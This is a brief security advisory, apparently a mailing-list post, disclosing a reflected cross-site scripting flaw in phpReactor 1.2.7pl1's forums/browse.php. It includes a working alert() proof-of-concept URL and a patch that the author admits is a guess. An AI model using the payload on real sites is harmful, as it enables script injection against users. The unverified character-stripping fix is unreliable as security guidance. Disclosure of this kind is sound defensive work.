XSS bug in php(Reactor)

[Arab VieruZ <arabviersus () hotmail com>]

Vulnerable systems:
1.2.7pl1

Exploit:
forums/browse.php?fid=3&tid=46&go=<scri*pt>JavaScript:alert
('Hi');</scri*pt>

(with out "*")

Solution:
i thought this but i am not sure

open browse.php and add this code in line 52:

$go = HTMLSpecialChars($go);
$go = PREG_Replace("/[A-Z&.;:()~!@#$%^''*\{\}\/]/i", "", $go);

----------------------------------
Arab Vieruz

thanx